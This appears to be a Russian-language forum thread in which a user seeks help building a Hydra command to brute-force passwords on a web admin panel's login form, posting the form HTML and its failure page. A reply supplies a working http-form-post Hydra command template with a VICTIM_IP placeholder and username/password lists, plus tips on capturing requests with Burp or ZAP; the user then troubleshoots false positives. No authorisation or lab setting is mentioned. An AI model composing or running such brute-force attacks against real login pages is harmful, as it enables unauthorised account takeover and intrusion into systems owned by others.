Добрый день, помогите составить команду для Hydra (Windows), логины известны не получается составить форму для подбора пароля под данную веб форму <body class="page-login"><main class="page-content"><div class="page-inner"><div id="main-wrapper"><div class="row"><div class="col-md-3 center"><div class="login-box"><a href="" class="logo-name text-lg text-center">Admin</a><p class="text-center m-t-md">Admin panel login</p><form id="login-form" method="post" class="m-t-md"><div class="form-group"><input type="text" name="username" placeholder="Login" required class="form-control"></div><div class="form-group"><input type="password" name="password" placeholder="Password" required class="form-control"></div><button class="btn btn-success btn-block">Login</button>
А form action и текст/исходник страницы после неудачной попытки авторизации где ? Вот пример, у Вас будет что-то похожее - hydra VICTIM_IP http-form-post "/form_login/dataReceptor.php:username=^USER^&password=^PASS^:Bad login" -L users.txt -P pass.txt -o hydra-http-post-attack.txt P.S.: Гораздо полезнее и проще будет записать request-response при проверке пароля Burp-ом или OWASP ZAP-ом, и выложить сюда body|headers.
После неудачной попытки <body class="page-login"><main class="page-content"><div class="page-inner"><div id="main-wrapper"><div class="row"><div class="col-md-3 center"><div class="login-box"><a href="" class="logo-name text-lg text-center">Admin</a><p class="text-center m-t-md">Admin panel login</p><p class="alert alert-danger">Incorrect login or password</p><form id="login-form" method="post" class="m-t-md"><div class="form-group"><input type="text" name="username" placeholder="Login" required class="form-control"></div><div class="form-group"><input type="password" name="password" placeholder="Password" required class="form-control"></div><button class="btn btn-success btn-block">Login</button>
Подбор как бы запустил но гидра находит не верные пароли к логину и пишет их в good.txt Что то не так делаю =(
